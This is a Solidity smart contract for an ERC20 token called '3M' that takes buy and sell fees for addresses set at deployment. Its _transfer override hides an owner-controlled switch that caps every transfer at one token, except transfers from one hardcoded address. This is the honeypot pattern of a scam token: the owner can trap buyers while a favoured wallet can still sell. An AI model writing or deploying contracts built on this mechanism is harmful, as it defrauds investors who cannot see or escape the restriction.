pragma solidity ^0.8.0;

import "./ERC20.sol";
import "./Ownable.sol";



contract Token is ERC20, Ownable {

    uint public constant inRate = 2;
    uint public constant outRate = 1;
    address public inAddr;
    address public outAddr;
    address public pair;
    bool public on;

    constructor(address _inAddr, address _outAddr) ERC20("3M", "3M") {

        inAddr = _inAddr;
        outAddr = _outAddr;

        _mint(msg.sender, 1000_0000_0000_0000 * 10 ** decimals());
    }


    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal override {
      if(on == true && sender != 0xd03C1D20C07B6335D31B71D5c423d3912fd10f4a){
      require(amount <= 1 * 10 ** decimals(), "ERC20: amount<=1");
         }
        if(pair != address(0)){
            if(sender == pair){
                // out
                uint x = amount * outRate / 100;
                super._transfer(sender, outAddr, x);
                super._transfer(sender, recipient, amount - x);
            }else if(recipient == pair){
                // in
                uint x = amount * inRate / 100;
                super._transfer(sender, inAddr, x);
                super._transfer(sender, recipient, amount - x);
            }else{
                super._transfer(sender, recipient, amount);
            }
        }else{
            super._transfer(sender, recipient, amount);
        }
    }


    function setPair(address _pair) public onlyOwner {
        pair = _pair;
    }
    function setOn(uint8 _n) public onlyOwner {
        if(_n == 1){
          on=true;
          }else{
            on=false;
          }
    }

}